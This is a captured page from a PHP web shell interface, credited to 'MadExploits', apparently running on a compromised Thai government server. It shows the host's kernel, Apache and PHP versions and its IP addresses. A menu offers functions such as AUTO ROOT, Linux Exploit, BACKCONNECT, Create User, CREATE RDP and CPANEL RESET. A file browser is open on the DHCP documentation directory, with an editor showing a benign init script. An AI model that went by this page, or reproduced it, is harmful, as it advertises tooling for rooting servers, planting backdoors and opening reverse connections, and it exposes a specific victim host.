Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
dhcp-4.1.1 /
[ HOME SHELL ]
Name
Size
Permission
Action
ms2isc
[ DIR ]
drwxr-xr-x
3.0b1-lease-convert
2.68
KB
-rw-r--r--
IANA-arp-parameters
5.46
KB
-rw-r--r--
README.ldap
7.87
KB
-rw-r--r--
api+protocol
18.07
KB
-rw-r--r--
dhclient-tz-exithook.sh
4.97
KB
-rw-r--r--
dhcpd-conf-to-ldap
16.97
KB
-rw-r--r--
dhcpd.conf.sample
3.19
KB
-rw-r--r--
dhcpd6.conf.sample
3.23
KB
-rw-r--r--
draft-ietf-dhc-ldap-schema-01....
40.79
KB
-rw-r--r--
sethostname.sh
899
B
-rw-r--r--
solaris.init
426
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : solaris.init
#!/bin/sh # Contributed by Brian Murrell state=$1 set `who -r` case $state in 'start') if [ $9 = "2" -o $9 = "3" ] then exit fi if [ -f @PREFIX@/sbin/dhcpd ]; then echo "Starting the ISC DHCP server" @PREFIX@/sbin/dhcpd fi ;; 'stop') if [ -f @PREFIX@/etc/dhcpd.pid ]; then PID=`cat @PREFIX@/etc/dhcpd.pid` if [ -d /proc/$PID ]; then echo "Stopping the ISC DHCP server" kill $PID fi fi ;; esac
Close